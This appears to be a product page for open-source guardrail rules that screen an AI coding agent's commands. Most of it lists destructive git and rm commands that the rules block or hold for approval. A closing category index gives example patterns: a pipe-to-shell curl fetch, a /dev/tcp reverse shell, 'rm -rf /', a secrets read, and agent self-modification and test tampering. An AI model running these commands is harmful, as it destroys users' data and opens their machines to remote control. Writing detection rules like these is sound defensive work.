working-tree pack
Lost work and rewritten history guardrails
These rules protect work Git cannot give back. Uncommitted edits and untracked files have no reflog, so git reset --hard or git clean -fdx loses them for good, and git push --force overwrites history other people may already have pulled. Those are blocked. Deliberate cleanups like git stash drop, git branch -D and rm -rf on a source folder ask you first.
- Rules
- 9
- Block
- 5
- Ask first
- 4
- Warn
- 0
Rules
What each rule catches
Every rule below is open source and tested against the commands it must catch and the near-misses it must leave alone. Open one for its full description, every example, and how to change what it does.
- High severityBlock
wt.reset-hardgit reset --hard discards uncommitted work
Catches, for example
- git reset --hard
- git reset --hard HEAD~3
- git reset --hard origin/main
- High severityBlock
wt.checkout-discardgit checkout used to discard working-tree changes
Catches, for example
- git checkout -- src/api.ts
- git checkout -- .
- git checkout .
- High severityBlock
wt.restore-pathgit restore discards uncommitted changes to a path
Catches, for example
- git restore src/api.ts
- git restore .
- git restore --source=HEAD~2 src/api.ts
- Medium severityAsk
wt.stash-dropgit stash drop / clear deletes stashed work
Catches, for example
- git stash drop
- git stash clear
- git stash drop stash@{2}
- Medium severityAsk
wt.branch-force-deletegit branch -D force-deletes an unmerged branch
Catches, for example
- git branch -D feature/abandoned
- git branch --delete --force feature/abandoned
- git branch -D feature/a feature/b
- High severityBlock
wt.clean-fdxgit clean -fd deletes untracked files
Catches, for example
- git clean -fd
- git clean -fdx
- git clean -xdf
- Medium severityAsk
wt.reset-mergegit reset --merge / --keep can discard local changes
Catches, for example
- git reset --merge
- git reset --keep origin/main
- git reset --merge HEAD~1
- High severityBlock
block-force-pushBlock git force-push
Catches, for example
- git push origin main --force
- git push --force origin main
- git push -f origin feature/x
- High severityAsk
require-approval-rm-rfHold
rm -rffor approvalCatches, for example
- rm -Rf /home/user/projects
- rm -fr src/generated
- rm -rf $HOME/Projects/old-client
More of the library
Other kinds of risk
The library files every rule by the harm it prevents. See all of them on one page, or check a command against every rule at once.
Unrecoverable data loss
8 rulesData git cannot bring back: a dropped volume, a dropped database, destructive DDL, a deleted shadow copy.
$ rm -rf /Production infrastructure
8 rulesChanging running infrastructure: Terraform, Kubernetes, Helm, cloud deletes, a deploy that names production.
$ terraform apply -auto-approveSecret exposure
10 rulesCredentials and sensitive data leaving where they live. Mostly warnings: reading a secret is a normal part of a normal day.
$ aws secretsmanager get-secret-value --secret-id prod/dbRemote code execution
6 rulesRunning code nobody reviewed: pipe-to-shell, a remote runner, a redirected registry, TLS verification off.
$ bash -c "$(curl -fsSL https://example.com/i.sh)"Safety check bypass
7 rulesTurning off a check somebody installed on purpose, or erasing the record of it: skipped hooks, admin merges, purged history.
$ git commit --no-verify -m "wip"Privilege and supply chain
6 rulesGaining reach or handing it out: sudo writes, wide-open permissions, IAM grants, persistence, publishing, new dependencies.
$ echo '127.0.0.1 x' | sudo tee -a /etc/hostsOut-of-scope file write
4 rulesWriting somewhere the agent has no business writing: its own config, the machine, git's internals, the CI definition.
› .claude/settings.jsonAgent self-modification
6 rulesThe agent changing what it is or what it knows: its instructions, memory, skills and MCP servers, or starting more agents.
› CLAUDE.mdTest tampering
6 rulesMaking the work look successful: deleting a test, weakening the runner's config, accepting every snapshot, skipping CI.
$ rm src/parser.test.tsMoving data off the machine or opening a way in: a reverse shell, a public tunnel, a file upload, a paste service.
$ bash -i >& /dev/tcp/10.0.0.1/4444 0>&1Run it locally
Put these guardrails in front of your agent.
AgentTrail Guard is free and open source. It checks every command and file change against the whole library before your agent runs it, on your machine, with no account.
npm i -g @agenttrail/guard